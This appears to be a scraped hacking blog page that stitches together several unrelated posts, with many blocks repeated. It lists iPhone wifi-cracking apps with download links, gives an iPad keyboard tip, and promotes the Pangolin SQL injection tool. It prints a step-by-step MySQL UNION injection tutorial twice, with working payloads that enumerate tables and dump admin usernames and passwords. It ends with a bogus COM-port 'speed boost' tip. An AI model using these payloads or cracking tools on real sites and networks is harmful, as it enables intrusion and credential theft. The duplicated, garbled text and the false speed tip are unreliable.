It works on the same scene as other cracking softwares except iweplite means it sends packets and break in the security of a wifi network . It is easy in use and can easily be used by anyone. It can be download from here.
http://www.filecrop.com/Iwifihack.ipa.html
--------------------------------
It is the simple command line with graphical interface software which is used to crack wifi networks . It sends packets to the wifi network and then cracks the password file of the network .It is used widely and can be downloaded from here.
http://www.filecrop.com/Aircrack-ng-for-iPhone.html
2. IWep Lite:
-----------------
It is an Iphone applications which let you crack wifi network in less than 30 minutes . It is easy in use and can be understood easily rather than Aircrack-ng . It is Graphical interface with best utility and dictionary . Apart from Aircrac-ng it uses dictionary and so it is less trustworthy than Aircrack and can not crack every key. It is used more widely than Aircrack but it uses dictionary that's why it is on 2nd number. It can be downloaded from here .
http://www.filecrop.com/iWep-Lite.ipa.html
3. WepGen:
---------------
WepGen is just another application which cracks the Wifi network by sending packets and it is rather easy in use than Aircrack but though it is on 3rd number due to it's popularity. It can be downloaded from here.
http://www.filecrop.com/wep-gen.ipa.html
4. IWifi Hack:
------------------
It works on the same scene as other cracking softwares except iweplite means it sends packets and break in the security of a wifi network . It is easy in use and can easily be used by anyone. It can be download from here.
http://www.filecrop.com/Iwifihack.ipa.html
iPad’s Split Keyboard Has Six Hidden Keys For Your Convenience
Apple
sneaks in some very subtle, yet incredibly useful features in iOS from
time to time. One such feature comes bundled with the split keyboard for
the iPad in iOS 5.0.1/iOS 5.
If you see the split keyboard, you’ll notice that the inner extremes of both the keyboard parts have some extra space left.
Turns out, this empty space actually houses extra keys according to the standard QWERTY layout, to play well with the typing practices of all users.
These duplicate keys let you tap an adjacent key on the other side of the split.
Such attention to fine detail is characteristic of Apple. Another, very similar, example of Apple playing around with the iOS keyboard buttons to add extra functionality is, the Siri dictation key on the iPhone 4S, which doubles up as a spacebar when typing.
Tip:
-----
Here’s how to enable the split keyboard:
>>Tap and hold on the keyboard button at the bottom right corner of your iPad’s keyboard (the one you generally tend to use for hide the keyboard).
>>You should get two options: Undock and Split.
>>Tap on Split to use the split keyboard.
If you see the split keyboard, you’ll notice that the inner extremes of both the keyboard parts have some extra space left.
Turns out, this empty space actually houses extra keys according to the standard QWERTY layout, to play well with the typing practices of all users.
These duplicate keys let you tap an adjacent key on the other side of the split.
Such attention to fine detail is characteristic of Apple. Another, very similar, example of Apple playing around with the iOS keyboard buttons to add extra functionality is, the Siri dictation key on the iPhone 4S, which doubles up as a spacebar when typing.
Tip:
-----
Here’s how to enable the split keyboard:
>>Tap and hold on the keyboard button at the bottom right corner of your iPad’s keyboard (the one you generally tend to use for hide the keyboard).
>>You should get two options: Undock and Split.
>>Tap on Split to use the split keyboard.
Wednesday, February 6, 2013
SQL INJECTION TOOL -PANGOLIN
Pangolin
is a penetration testing, SQL Injection test tool for database
security. It finds SQL Injection vulnerabilities.Its goal is to detect
and take inform you of SQL injection vulnerabilities in web
applications. Once it detects an SQL injections on the target host, the
user can choose among a variety of options to perform an extensive
back-end database management system fingerprint, retrieve DBMS session
user and database, enumerate users,
password hashes, privileges, databases, dump entire or user”s specific
DBMS tables/columns, run his own SQL statement, read specific files on
the file system and more.
Database Support:
* Access: Informations (Database Path; Root Path; Drivers); Data
* MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
* MySql: Informations; Data; FileReader; FileWriter;
* Oracle: Inforatmions (Version; IP; Database; Accounts); Data;
* Informix: Informatons; Data
* DB2: Informatons; Data; and more;
* Sybase: Informatons; Data; and more;
* PostgreSQL: Informatons; Data; FileReader;
* Sqlite: Informatons; Data
Download Free Edition:
---------------------------
http://nosec.org/en/evaluate/
How To Hack Websites , Mysql Injection
SQL Injection in MySQL Databases
----------------------------------------
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
Step 1:
----------
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2
---------
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
Step 3
--------
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
Step 4
---------
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database
For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
Step 5
---------
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
Step 6
---------
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
Step 7
--------
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
----------------------------------------
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
Step 1:
----------
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2
---------
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
Step 3
--------
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
Step 4
---------
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database
For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
Step 5
---------
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
Step 6
---------
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
Step 7
--------
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
Increase your internet speed
1: go to ur desktop
2: right click on "My computer"
3: den select "properties"
4: den click on "HARDWARE" tab
5: den click "Device manager"
6: now u see a new window(Device manager window)
7: look down now u can see "Ports(COM & LPT)" ...click on it
8:den double click on "Communication Ports"
9: after open u can see a "Communication Port properties"..
10: now go the "Port Setting"
11: and now change ur "Bits per second" to "128000".
12: and "Flow control" change 2 "Hardware".
apply and see the result.........
2: right click on "My computer"
3: den select "properties"
4: den click on "HARDWARE" tab
5: den click "Device manager"
6: now u see a new window(Device manager window)
7: look down now u can see "Ports(COM & LPT)" ...click on it
8:den double click on "Communication Ports"
9: after open u can see a "Communication Port properties"..
10: now go the "Port Setting"
11: and now change ur "Bits per second" to "128000".
12: and "Flow control" change 2 "Hardware".
apply and see the result.........
Subscribe to:
Posts (Atom)